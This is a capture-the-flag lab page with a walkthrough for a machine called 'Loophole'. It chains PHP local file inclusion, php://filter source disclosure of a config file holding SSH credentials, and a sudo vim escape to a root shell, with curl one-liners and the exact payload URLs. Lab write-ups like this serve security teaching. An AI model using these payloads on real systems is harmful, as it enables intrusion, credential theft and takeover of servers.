RatLabs
🐀🐀 0 pts earned

Loophole

An internal document viewer built in a hurry left its file-inclusion logic wide open. The config file is right there in the web root — PHP just won't show it to you. Figure out how to read source without executing it, recover the credentials, and turn a sudo misconfig into a root shell.

🕐 Launching Soon

Launching in calculating...

Machine may be having trouble (checked 7m ago)
Target IP Log in to reveal
User Flag Pending
Root Flag Pending

Premium

Walkthrough, Tips and Tricks

Walkthrough

Objective

Exploit a PHP Local File Inclusion vulnerability to read application source, recover credentials, and escalate to root via a sudo misconfiguration.

Attack Narrative

IntraView was deployed in "development mode" without sanitizing the ?page= parameter. The developer stored service-account credentials in a PHP config file in the web root — thinking PHP's execution model would protect them. It doesn't. PHP stream wrappers bypass execution and return raw source, revealing everything needed to SSH in and escalate.

Prerequisites

  • HTTP enumeration basics (curl, browser DevTools).
  • Familiarity with PHP stream wrappers (php://filter).
  • Base64 decoding.
  • GTFOBins methodology for sudo escalation.

Phase 1: Web Reconnaissance

  1. Scan the target — ports 22 (SSH) and 80 (HTTP).
  2. Browse to http://TARGET/ — IntraView document portal.
  3. Identify the ?page= parameter in the URL.
  4. Read the Documentation page — note that path validation is disabled.

Phase 2: Confirm LFI

Test for path traversal:

http://TARGET/?page=../../../etc/passwd

The passwd file renders in the page. LFI is confirmed.

Phase 3: Read PHP Source via Filter Wrapper

Direct inclusion of config.php produces no output (PHP executes it silently).
Use the php://filter stream wrapper to base64-encode the file before inclusion:

http://TARGET/?page=php://filter/convert.base64-encode/resource=config.php

Copy the base64 output and decode:

echo "<base64_string>" | base64 -d

The source reveals SSH credentials:

define('SVC_USER', 'webdev');
define('SVC_PASS', 'L0c4lF1l3!');

Phase 4: Initial Access

ssh webdev@TARGET
cat ~/user.txt

Phase 5: Privilege Escalation

sudo -l
# (root) NOPASSWD: /usr/bin/vim

Escalate via vim GTFOBins:

sudo vim -c ':!/bin/bash'
cat /root/root.txt

Troubleshooting

  • LFI shows nothing: confirm the path traversal reaches a readable file — try /etc/hostname first.
  • filter output is garbled: copy the entire base64 block without line breaks before decoding.
  • sudo vim blocked: check exact sudo rule — GTFOBins lists multiple vim escape methods.

Verification Checklist

  • LFI confirmed via /etc/passwd traversal.
  • PHP filter wrapper used to read config.php source.
  • Credentials decoded and SSH access obtained.
  • Root shell achieved via sudo vim.
Tips and Tricks

Tips and Tricks

  • Always try /etc/passwd first to confirm LFI — it's readable and unambiguous.
  • php://filter/convert.base64-encode/resource=<file> works on any file PHP can open, not just PHP files.
  • Check /proc/self/environ, /var/log/apache2/access.log, and /etc/hosts for additional data points.
  • GTFOBins: sudo vim -c ':!/bin/bash' drops you to a shell as root instantly.

Useful Commands

curl "http://TARGET/?page=../../../etc/passwd"
curl "http://TARGET/?page=php://filter/convert.base64-encode/resource=config.php" | grep -oP '[A-Za-z0-9+/=]{20,}' | base64 -d
sudo vim -c ':!/bin/bash'

Community

Community Walkthroughs

No community walkthroughs yet — be the first!

Log in to submit your own walkthrough.